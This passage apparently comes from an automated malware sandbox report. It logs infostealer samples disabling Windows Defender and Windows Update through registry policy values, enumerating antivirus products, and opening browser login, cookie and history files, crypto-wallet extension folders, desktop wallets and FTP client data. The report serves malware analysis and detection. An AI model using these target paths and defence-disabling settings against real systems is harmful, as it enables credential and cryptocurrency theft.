                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeRegistry value created: TamperProtection 0
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                          Source: 24da741fb6.exe, 0000000B.00000003.2799995147.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2685688622.00000000011B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
                          Source: 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 6.2.skotes.exe.4b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.skotes.exe.4b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.4b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.7a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.1734062990.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.1695582240.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1736142318.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000003.1693609127.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000003.2335093980.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1704119383.00000000007A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1663903218.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 203f60e481.exe PID: 5300, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 24da741fb6.exe PID: 1236, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 13.2.0d8313073f.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000D.00000002.2940306745.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2922718430.0000000000611000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.2559813189.0000000005310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 0d8313073f.exe PID: 4136, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: 24da741fb6.exe, 0000000B.00000003.2529120608.00000000011CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: 24da741fb6.exe, 0000000B.00000003.2529120608.00000000011CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                          Source: 24da741fb6.exe, 0000000B.00000003.2588490537.0000000005967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                          Source: 24da741fb6.exe, 0000000B.00000003.2527964118.00000000011D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.jsonn
                          Source: 24da741fb6.exe, 0000000B.00000003.2529120608.00000000011CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: 24da741fb6.exe, 0000000B.00000003.2583452418.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: 24da741fb6.exe, 0000000B.00000003.2527964118.00000000011D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                          Source: 24da741fb6.exe, 0000000B.00000003.2588490537.0000000005967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: Fwkdsz.exe, 00000007.00000002.2671334911.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                          Source: 24da741fb6.exe, 0000000B.00000003.2527822661.00000000011CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
